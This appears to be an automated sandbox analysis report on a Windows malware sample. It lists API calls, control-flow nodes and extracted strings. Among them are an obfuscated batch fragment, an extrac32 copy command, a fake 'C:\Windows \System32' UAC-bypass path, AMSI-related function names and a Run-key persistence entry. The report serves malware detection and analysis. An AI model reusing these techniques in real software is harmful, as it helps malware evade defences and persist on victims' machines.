2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8828->8832 8871 2e04df5-2e04dfc call 2df7be8 8832->8871 8875 2e04e01-2e04e6c call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8871->8875 8899 2e04e71-2e04e78 call 2df7be8 8875->8899 8903 2e04e7d-2e04eca call 2de4824 call 2de4964 call 2de4698 8899->8903 8915 2e04ecf-2e04edc call 2df4d90 8903->8915 8918 2e04edf-2e04ef6 call 2de36c4 8915->8918
APIs
• Part of subcall function 02DF7BE8: LoadLibraryW.KERNEL32(?,00000000,02DF7C9A), ref: 02DF7C18
• Part of subcall function 02DF7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02DF7C9A), ref: 02DF7C1E
• Part of subcall function 02DF7BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02DF7C37
• Part of subcall function 02DFC3F8: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DFC4CA), ref: 02DFC437
• Part of subcall function 02DFC3F8: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02DFC471
• Part of subcall function 02DFC3F8: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02DFC49E
• Part of subcall function 02DFC3F8: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02DFC4A7
• Part of subcall function 02DE7E18: GetFileAttributesA.KERNEL32(00000000,?,02DFE0EE,ScanString,02E45344,02E08FEC,OpenSession,02E45344,02E08FEC,ScanString,02E45344,02E08FEC,UacScan,02E45344,02E08FEC,UacInitialize), ref: 02DE7E23
• Sleep.KERNEL32(00001770,UacScan,02E45344,02E08FEC,ScanString,02E45344,02E08FEC,OpenSession,02E45344,02E08FEC,ScanBuffer,02E45344,02E08FEC,OpenSession,02E45344,02E08FEC), ref: 02E03094
• Part of subcall function 02DFC368: RtlInitUnicodeString.N(?,?,00000000,02DFC3E2), ref: 02DFC390
• Part of subcall function 02DFC368: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02DFC3E2), ref: 02DFC3A6
• Part of subcall function 02DFC368: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02DFC3E2), ref: 02DFC3C5
• WinExec.KERNEL32(00000000,02E09524), ref: 02E0436D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
• Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: FilePath$NameName_$AddressAttributesCloseCreateDeleteExecHandleInitLibraryLoadModuleProcSleepStringUnicodeWrite
• String ID: .url$@echo offset "Nnqr=set "%Nnqr%"njyC=="%Nnqr%"qkMvMLsfma%njyC%http"%Nnqr%"dbvWEsxWns%njyC%rem "%Nnqr%"NpzRZtRBVV%njyC%Cloa"%Nnqr%"ftNVZzSZxa%njyC%/Bat"%Nnqr%"TwupSEtIWD%njyC%gith"%Nnqr%"yIGacXULig%njyC%k"%Nnqr%"uGlGnqCSun%njyC%h2sh"%Nnqr%"FU$C:\Users\Public\$C:\Users\Public\alpha.exe$C:\Windows \System32\NETUTILS.dll$C:\Windows \System32\aaa.bat$C:\Windows \System32\easinvoker.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\extrac32.exe /C /Y $HotKey=$IconIndex=$Initialize$O.bat$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$[InternetShortcut]$a.bat$er.e$s.d
• API String ID: 102611719-2667577771
• Opcode ID: 2c25f64cffccf9540698eff47645135ec74a36ef42b476d0cbf1b4ddbde53344
• Instruction ID: bc0795ca9d2b010b4a4a5db7eccd1a92b700ea1a2111ab3b25d9a4a9bef59c3c
• Opcode Fuzzy Hash: 2c25f64cffccf9540698eff47645135ec74a36ef42b476d0cbf1b4ddbde53344
• Instruction Fuzzy Hash: 3053FA34A902598BEF20FB65DC80EDD73B6EB85700F5095E5A10AA7354DE70AEC2CF64
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                    control_flow_graph 9338 1568cdf9-1568ce14 call 156bbad6 9341 1568ce60-1568ce7b call 1568da34 call 15681f13 9338->9341 9342 1568ce16-1568ce36 call 15681f04 CreateDirectoryW call 1568915b 9338->9342 9349 1568ce80-1568cea0 call 15681f09 call 15681f04 call 156bf954 9341->9349 9350 1568ce3b-1568ce5e call 15683014 call 15681f13 call 15681f09 9342->9350 9363 1568cebf-1568ced4 call 15681f04 CopyFileW 9349->9363 9364 1568cea2-1568ceb5 call 15681f04 call 1568cd0d 9349->9364 9350->9349 9370 1568cf99-1568cfb1 call 15681f04 call 1568cd0d 9363->9370 9371 1568ceda-1568cedf 9363->9371 9375 1568ceb7-1568cebe 9364->9375 9385 1568cfdf-1568cfe4 9370->9385 9386 1568cfb3-1568cfce call 15681f04 SetFileAttributesW call 156bbad6 9370->9386 9371->9370 9373 1568cee5-1568cef4 call 156bbad6 9371->9373 9380 1568cf49-1568cf58 call 1568da34 call 15681f13 9373->9380 9381 1568cef6-1568cf47 call 1568da34 call 15681f13 call 15681f09 call 1568915b call 15683014 call 15681f13 call 15681f09 9373->9381 9402 1568cf5c-1568cf88 call 15681f09 call 15681f04 CreateDirectoryW call 15681f04 CopyFileW 9380->9402 9381->9402 9388 1568cfe6-1568d022 call 1568417e call 1569bc5e call 15681f04 call 15693814 call 15681f09 9385->9388 9389 1568d027-1568d054 CloseHandle call 15681f04 ShellExecuteW 9385->9389 9386->9385 9410 1568cfd0-1568cfdd call 15681f04 SetFileAttributesW 9386->9410 9388->9389 9405 1568d060-1568d062 ExitProcess 9389->9405 9406 1568d056-1568d05b call 1568d069 9389->9406 9402->9370 9432 1568cf8a-1568cf8d call 15689057 9402->9432 9421 1568cf92-1568cf94 9406->9421 9410->9385 9421->9375 9432->9421
                                                                                                                                                    APIs
                                                                                                                                                    • _wcslen.LIBCMT ref: 1568CE07
                                                                                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,156F50E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 1568CE20
                                                                                                                                                    • CopyFileW.KERNEL32(C:\Users\user\Desktop\fu56fbrtn8.exe,00000000,00000000,00000000,00000000,00000000,?,156F50E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 1568CED0
                                                                                                                                                    • _wcslen.LIBCMT ref: 1568CEE6
                                                                                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 1568CF6E
                                                                                                                                                    • CopyFileW.KERNEL32(C:\Users\user\Desktop\fu56fbrtn8.exe,00000000,00000000), ref: 1568CF84
                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 1568CFC3
                                                                                                                                                    • _wcslen.LIBCMT ref: 1568CFC6
                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 1568CFDD
                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,156F50E4,0000000E), ref: 1568D02D
                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,156E6468,156E6468,00000001), ref: 1568D04B
                                                                                                                                                    • ExitProcess.KERNEL32 ref: 1568D062
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                                                                                    • String ID: 6$C:\Users\user\Desktop\fu56fbrtn8.exe$del$open
                                                                                                                                                    • API String ID: 1579085052-2548682020
                                                                                                                                                    • Opcode ID: abf259eee7ee940377874ab58b072b0e5394c0a366cf989b9331b30f746ec6ce
                                                                                                                                                    • Instruction ID: 04c36ce507a6fde2bc9f80cb009ef99de86cb2db667cb76038fadc072b7f349a
                                                                                                                                                    • Opcode Fuzzy Hash: abf259eee7ee940377874ab58b072b0e5394c0a366cf989b9331b30f746ec6ce
                                                                                                                                                    • Instruction Fuzzy Hash: BA51E76571A340ABE618EB24DC60E6F77EDAF94625F80040DF5458B380EF64BD04C3EA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph (graph image not reproduced)
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 02DF7BE8: LoadLibraryW.KERNEL32(?,00000000,02DF7C9A), ref: 02DF7C18
                                                                                                                                                      • Part of subcall function 02DF7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02DF7C9A), ref: 02DF7C1E
                                                                                                                                                      • Part of subcall function 02DF7BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02DF7C37
                                                                                                                                                      • Part of subcall function 02DFD318: RegOpenKeyA.ADVAPI32(?,00000000,02E45798), ref: 02DFD35C
                                                                                                                                                      • Part of subcall function 02DFD318: RegSetValueExA.ADVAPI32(000008A8,00000000,00000000,00000001,00000000,0000001C,00000000,02DFD3C7), ref: 02DFD394
                                                                                                                                                      • Part of subcall function 02DFD318: RegCloseKey.ADVAPI32(000008A8,000008A8,00000000,00000000,00000001,00000000,0000001C,00000000,02DFD3C7), ref: 02DFD39F
                                                                                                                                                    • WinExec.KERNEL32(00000000,00000000), ref: 02E057F9
                                                                                                                                                      • Part of subcall function 02DF9E70: CompareStringA.KERNEL32(00000400,00000001,00000000,?,00000000), ref: 02DF9F33
                                                                                                                                                    • RtlMoveMemory.N(00000000,?,00000000,?,ScanBuffer,02E45344,02E08FEC,UacScan,02E45344,02E08FEC,OpenSession,02E45344,02E08FEC,OpenSession,02E45344,02E08FEC), ref: 02E05D7B
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressCloseCompareExecHandleLibraryLoadMemoryModuleMoveOpenProcStringValue
                                                                                                                                                    • String ID: C:\Users\Public\$C:\Windows\System32\$Initialize$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan
                                                                                                                                                    • API String ID: 897696978-872072817
                                                                                                                                                    • Opcode ID: b1c08c4d39796d7dfefae5bef9693ef178fcf383fde1d62daec2743214fe5464
                                                                                                                                                    • Instruction ID: 3a048c3e40dff5e15ad9a4f9a3c72df632a739d09a7e8b217704a532cc923964
                                                                                                                                                    • Opcode Fuzzy Hash: b1c08c4d39796d7dfefae5bef9693ef178fcf383fde1d62daec2743214fe5464
                                                                                                                                                    • Instruction Fuzzy Hash: 5992F734A802988BDF10FB65DC809DD73B7EB85700F5085E5A64AEB354DA70AEC2CF64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph (graph image not reproduced)
                                                                                                                                                    APIs
                                                                                                                                                    • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 1568DB9A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LongNamePath
                                                                                                                                                    • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                                                                    • API String ID: 82841172-425784914
                                                                                                                                                    • Opcode ID: bb82fce8033ad485a25ae5aaeae8dc0ff0b7d1424d6d0a4168b1fb43be836610
                                                                                                                                                    • Instruction ID: 4812d4c43d53474cf0704fb3de1623567235b5dad1bdc6e83686ceae2dd5c863
                                                                                                                                                    • Opcode Fuzzy Hash: bb82fce8033ad485a25ae5aaeae8dc0ff0b7d1424d6d0a4168b1fb43be836610
                                                                                                                                                    • Instruction Fuzzy Hash: F341347520A3419BD314DB60EC50CAFB3F9AEA0255F10061DF446921A4FF70BE49C6EA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph (graph image not reproduced)
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 1569BFB7: GetCurrentProcess.KERNEL32(?,?,?,1568DAAA,WinDir,00000000,00000000), ref: 1569BFC8
                                                                                                                                                      • Part of subcall function 1569BFB7: IsWow64Process.KERNEL32(00000000,?,?,1568DAAA,WinDir,00000000,00000000), ref: 1569BFCF
                                                                                                                                                      • Part of subcall function 156935A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 156935CA
                                                                                                                                                      • Part of subcall function 156935A6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 156935E7
                                                                                                                                                      • Part of subcall function 156935A6: RegCloseKey.ADVAPI32(?), ref: 156935F2
                                                                                                                                                    • StrToIntA.SHLWAPI(00000000,156EC9F8,00000000,00000000,00000000,156F50E4,00000003,Exe,00000000,0000000E,00000000,156E60BC,00000003,00000000), ref: 1569B33C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                                                                                                    • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                    • API String ID: 782494840-2070987746
                                                                                                                                                    • Opcode ID: 0b65bd4223e4606baf54e18a9ea8a277d2543551168cea7077005c0fd3751ca2
                                                                                                                                                    • Instruction ID: ca8f0627864e48f6322c677be233e610e663f76e4d461bce5b9f8062c6a8f747
                                                                                                                                                    • Opcode Fuzzy Hash: 0b65bd4223e4606baf54e18a9ea8a277d2543551168cea7077005c0fd3751ca2
                                                                                                                                                    • Instruction Fuzzy Hash: CE112970B0B2449ED708E264CC95DBF7759DB54110F940219E506A32D5EE607C41C3F9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

Control-flow Graph

[Graph image not recoverable from the text; summary of the extracted node list: first listed block 02DE1724, blocks spanning 02DE1684 to 02DE1A8B. Blocks carrying calls: VirtualAlloc at 02DE1684-02DE16AD; Sleep at 02DE17CB, 02DE17E4, 02DE180A, 02DE1820, 02DE1947 and 02DE195D; internal calls to 02DE1644, 02DE15CC and 02DE1500. The executed / not-executed colouring of the original image is lost.]
                                                                                                                                                    APIs
                                                                                                                                                    • Sleep.KERNEL32(00000000,?,02DE1FC1), ref: 02DE17D0
                                                                                                                                                    • Sleep.KERNEL32(0000000A,00000000,?,02DE1FC1), ref: 02DE17E6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
• Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Sleep
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                                    • Opcode ID: 96cd6641ca24742694fb500ba181194fcd8a048ea7f11556e9be1fbe9efbc034
                                                                                                                                                    • Instruction ID: f41130d2388ee8869adfd34281582d9683798206558ba329ff362ecd52de0c9f
                                                                                                                                                    • Opcode Fuzzy Hash: 96cd6641ca24742694fb500ba181194fcd8a048ea7f11556e9be1fbe9efbc034
                                                                                                                                                    • Instruction Fuzzy Hash: 94B14576B402518BCF15EF29D8C4765BBE1EB84314F48866DE95E8B385C770DC92CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,02DF7BA5,?,?,00000000,00000000), ref: 02DF7B61
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 02DF7B67
                                                                                                                                                    • VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,02DF7BA5,?,?,00000000,00000000), ref: 02DF7B81
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
• Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                    • String ID: irtualProtect$kernel32
                                                                                                                                                    • API String ID: 2099061454-2063912171
                                                                                                                                                    • Opcode ID: e6037e3024891b24642634a06097b4a60af973a6c0a74dc4430d653d7049d1da
                                                                                                                                                    • Instruction ID: a4579225a70d28f4d3b74da8f2cf34315d9271b779e9e9df97bcfabf1b501d39
                                                                                                                                                    • Opcode Fuzzy Hash: e6037e3024891b24642634a06097b4a60af973a6c0a74dc4430d653d7049d1da
                                                                                                                                                    • Instruction Fuzzy Hash: CC012C75640248AFFB40FFA4EC51E9EB7EDEB49710F914854FA05E3740D670EE118A68
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

Control-flow Graph

[Graph image not recoverable from the text; summary of the extracted node list: first listed block 02DE1A8C, blocks spanning 02DE16E8 to 02DE1C6B. Blocks carrying calls: Sleep at 02DE1B13, 02DE1B2D, 02DE1B4B and 02DE1B61; VirtualFree at 02DE16E8-02DE170B (together with a call to 02DE1644) and at 02DE1C00-02DE1C28; internal calls to 02DE14C0 (twice), 02DE1500 and 02DE1560. The executed / not-executed colouring of the original image is lost.]
                                                                                                                                                    APIs
                                                                                                                                                    • Sleep.KERNEL32(00000000,?), ref: 02DE1B17
                                                                                                                                                    • Sleep.KERNEL32(0000000A,00000000,?), ref: 02DE1B31
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
• Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Sleep
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                                    • Opcode ID: 41ecb9e1d99c080176709bc9e48d279fcdbdd56f319519559a083496ed435d88
                                                                                                                                                    • Instruction ID: a8c4a14c5625e9f6fdae4414b20b364731e295886b04b793d851184b6b70bfd5
                                                                                                                                                    • Opcode Fuzzy Hash: 41ecb9e1d99c080176709bc9e48d279fcdbdd56f319519559a083496ed435d88
                                                                                                                                                    • Instruction Fuzzy Hash: 4D51C1757442408FDB15EF68C984766BBD0EF46314F5881AEE94ACB382D770DC86CBA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02DFC9EA
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
• Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CheckConnectionInternet
                                                                                                                                                    • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                                    • API String ID: 3847983778-3852638603
                                                                                                                                                    • Opcode ID: 699b1bf20109af272e11ab23182dc5164936c86ba4d58bfcf21baa7df7555da7
                                                                                                                                                    • Instruction ID: 7f23c2445462e368c25b6d237c3f9a7954a2f0f174f90d0fb67d3d0537970ac8
                                                                                                                                                    • Opcode Fuzzy Hash: 699b1bf20109af272e11ab23182dc5164936c86ba4d58bfcf21baa7df7555da7
                                                                                                                                                    • Instruction Fuzzy Hash: 0F412C31B602489BEF10FBA4D881ADEB3FAEF48714F614466E602B7340DA70AD158F64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 1569381F
                                                                                                                                                    • RegSetValueExW.KERNEL32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,156F52D8,755737E0,?), ref: 1569384D
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,156F52D8,755737E0,?,?,?,?,?,1568CFAA,?,00000000), ref: 15693858
                                                                                                                                                    Strings
                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 1569381D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseCreateValue
                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                                                                    • API String ID: 1818849710-1051519024
                                                                                                                                                    • Opcode ID: f1d5655ce68c01dbd47e05c31937e01679cab3ecf5e30093ca80cdc331c10224
                                                                                                                                                    • Instruction ID: 839dabda8ee3d3ac038d7743d80dd75f79e4a71ee9a8d174849c8456d29c3d23
                                                                                                                                                    • Opcode Fuzzy Hash: f1d5655ce68c01dbd47e05c31937e01679cab3ecf5e30093ca80cdc331c10224
                                                                                                                                                    • Instruction Fuzzy Hash: 2FF06D71A5122CFFDF109FA1EC45FEA376DEF04665F108519FC0596150EB31AA04DAE0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000001,00000000,1568EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,156E60BC,00000003,00000000), ref: 1568D078
                                                                                                                                                    • GetLastError.KERNEL32 ref: 1568D083
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: CreateErrorLastMutex
• String ID: Rmc-VLI916
• API String ID: 1925916568-2161943253
• Opcode ID: 6df144e85cb5b7d1fd3e843403b1790334efde4de72030d1f558e37c0e29fc3f
• Instruction ID: dd6223487406944d71b939ba5828c0b9db9fb0ba233a9c60a87fdfa365c71f46
• Opcode Fuzzy Hash: 6df144e85cb5b7d1fd3e843403b1790334efde4de72030d1f558e37c0e29fc3f
• Instruction Fuzzy Hash: 3ED012B5B352149BD7181B7488E975C39A99744711F80081DF447D59C0DF744890CAD1
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02DF5D30,?,?,02DF38BC,00000001), ref: 02DF5C44
• GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02DF5D30,?,?,02DF38BC,00000001), ref: 02DF5C72
  • Part of subcall function 02DE7D18: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02DF38BC,02DF5CB2,00000000,02DF5D30,?,?,02DF38BC), ref: 02DE7D66
  • Part of subcall function 02DE7F54: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02DF38BC,02DF5CCD,00000000,02DF5D30,?,?,02DF38BC,00000001), ref: 02DE7F73
• GetLastError.KERNEL32(00000000,02DF5D30,?,?,02DF38BC,00000001), ref: 02DF5CD7
  • Part of subcall function 02DEA734: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02DEC395,00000000,02DEC3EF), ref: 02DEA753
Memory Dump Source
• Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
• Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: CreateErrorFileLast$FormatFullMessageNamePath
• String ID:
• API String ID: 503785936-0
• Opcode ID: 043b0b7b96fed94b431f8989b8e30ac3e13ed599212f4de3c354535af918a07b
• Instruction ID: 56e15995bb97aedb2f0c37586e19c9047f986b639103466c824b53296e3c1471
• Opcode Fuzzy Hash: 043b0b7b96fed94b431f8989b8e30ac3e13ed599212f4de3c354535af918a07b
• Instruction Fuzzy Hash: 3A319F30A042489BEF40EFA5C881BAEBBB6EF48304F918565E505A7380D7749E05CFB5
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegOpenKeyA.ADVAPI32(?,00000000,02E45798), ref: 02DFD35C
• RegSetValueExA.ADVAPI32(000008A8,00000000,00000000,00000001,00000000,0000001C,00000000,02DFD3C7), ref: 02DFD394
• RegCloseKey.ADVAPI32(000008A8,000008A8,00000000,00000000,00000001,00000000,0000001C,00000000,02DFD3C7), ref: 02DFD39F
Memory Dump Source
• Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
